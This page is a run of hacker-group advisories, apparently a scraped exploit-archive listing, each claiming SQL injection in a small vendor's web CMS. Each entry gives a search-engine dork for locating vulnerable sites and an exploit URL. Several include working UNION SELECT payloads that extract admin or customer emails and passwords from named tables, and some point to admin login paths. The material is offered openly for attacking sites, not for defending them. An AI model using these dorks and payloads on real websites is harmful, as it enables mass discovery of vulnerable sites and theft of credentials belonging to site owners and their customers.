(GNU/Linux) iEYEARECAAYFAk4xdeMACgkQ4B86/C0qfVntSwCdF4drR9sS5wJ4+kFmIYfnv4NJ 7QcAn13pc8sXX/aSZf4FHCfx+7aFUpQw =v+ei -END PGP SIGNATURE-
Gopal Systems (products.php?cat_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Gopal Systems (products.php?cat_id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.gopalsystems.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by: Gopal Systems. inurl:products.php?cat_id= Exploite: www.victim.com/products.php?cat_id=-1 union select 1,2,3,4 from tbladmin # Admin Panel : www.victim.com/admin/ # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Agent Image (news_details.php?news_ID) Remote SQL injection Vulnerability
### IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Agent Image (news_details.php?news_ID) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.agentimage.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Design by Agent Image inurl:news_details.php?news_ID= Exploite: www.victim.com/news_details.php?news_ID=[SQL] ### Admin Panel: www.victim.com/admin/login.php # SpeCial TanX To : SaHand ShaBan , Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
G2webCMS (products.php?cat_id) (member-profile.php?profile) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## G2webCMS (products.php?cat_id) (member-profile.php?profile) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.g2web.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by G2webCMS inurl:products.php?cat_id= Exploite: www.victim.com/store/products.php?cat_id=[SQL] Dork : Powered by G2webCMS inurl:member-profile.php?profile= Exploite: www.victim.com/member-profile.php?profile=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
iCube Lab (product_details.php?cat_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## iCube Lab (product_details.php?cat_id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.icubelab.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by iCube Lab inurl:product_details.php?cat_id= Exploite: www.victim.com/product_details.php?cat_id=-1/**/union/**/select/**/Null,concat(email,0x3a,password),Null/**/from/**/user # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Solutiontech (product.php?cat_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Solutiontech (product.php?cat_id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.solutiontechindia.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by Solutiontech inurl:product.php' Exploite: www.victim.com/product.php?cat_id=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Chrome Web Solutions (details.php?cat_id) (listing_more.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Chrome Web Solutions (details.php?cat_id) (listing_more.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.chromewebsolutions.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered By : Chrome Web Solutions inurl:details.php?cat_id= Exploite: www.victim.com/details.php?cat_id=[SQL] Dork : Powered By : Chrome Web Solutions inurl:listing_more.php?id= Exploite: www.victim.com/listing_more.php?id=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Dow Group (dynamic.php?id) (sub.php?solutioncat_id) (news_desc.php?id) (product.php?id) Remote SQL injection Vulnerability
### IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Dow Group (dynamic.php?id) (sub.php?solutioncat_id) (news_desc.php?id) (product.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.dowgroup.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Designed by Dow Group inurl:dynamic.php?id= Exploite: www.victim.com/dynamic.php?id=[SQL] Dork : Designed by Dow Group inurl:news_desc.php?id= Exploite: www.victim.com/news_desc.php?id=[SQL] Dork : Designed by Dow Group product.php?id= Exploite: www.victim.com/product.php?id=[SQL] Dork : Designed by Dow Group inurl:solutions.php?id= Exploite: www.victim.com/solutions.php?id=[SQL] Dork : inurl:sub.php?solutioncat_id= Exploite: www.victim.com/sub.php?solutioncat_id=[SQL] # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Zones Web Solution (index.php?manufacturers_id) Remote SQL injection Vulnerability
### IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Zones Web Solution (index.php?manufacturers_id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.zones.in/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered By : Zones Web Solution inurl:index.php?manufacturers_id=' Exploite: www.victim.com/index.php?manufacturers_id=-1 union select concat(customers_email_address,0x3a,customers_password) from customers # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Funnel Web (items.php?cat_id) Remote SQL injection Vulnerability
### IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Funnel Web (items.php?cat_id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email: ehsan_hp...@hotmail.com ## ## Vendor : http://www.funnel-web.com.au/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Web site design by Funnel Web inurl:items.php Exploite: www.victim.com/items.php?cat_id=-1+Union+Select+1,concat(user_id,0x3a,user_pw),1+From+admin-- # SpeCial TanX To : Dj7Xpl ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
